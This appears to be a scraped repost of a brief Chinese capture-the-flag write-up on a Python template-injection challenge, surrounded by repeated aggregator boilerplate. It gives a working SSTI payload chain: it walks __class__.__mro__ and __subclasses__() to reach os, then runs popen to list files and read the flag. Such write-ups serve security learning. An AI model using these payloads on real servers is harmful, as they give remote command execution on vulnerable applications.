Web_python_template_injection SSTI printer方法

来自网友在路上 157857提问提问时间：2023-10-07 13:53:46阅读次数： 57

最佳答案问答题库578位专家为你答疑解惑

这题挺简单的就是记录一下不同方法的rce

python_template_injection

ssti了

{{''.__class__.__mro__[2].__subclasses__()}}

然后用脚本跑可以知道是 71

{{''.__class__.__mro__[2].__subclasses__()[71]}}

然后直接 init

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__}}

存在os

直接通过os rce 了

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

查看全文

99%的人还看了

相似问题

猜你感兴趣

版权申明

本文"Web_python_template_injection SSTI printer方法"：http://eshow365.cn/6-16794-0.html 内容来自互联网，请自行判断内容的正确性。如有侵权请联系我们，立即删除！

上一篇: 【gitlab】git push -u origin master 报403
下一篇: 代码随想录Day59 | 647. 回文子串 | 516. 最长回文子序列

晴海小常识分享

晴海小常识分享

Web_python_template_injection SSTI printer方法

最佳答案问答题库578位专家为你答疑解惑

python_template_injection

99%的人还看了

相似问题

猜你感兴趣

版权申明

推荐回答

晴海小常识分享

晴海小常识分享

Web_python_template_injection SSTI printer方法

最佳答案 问答题库578位专家为你答疑解惑

python_template_injection

99%的人还看了

相似问题

猜你感兴趣

版权申明

推荐回答

最佳答案问答题库578位专家为你答疑解惑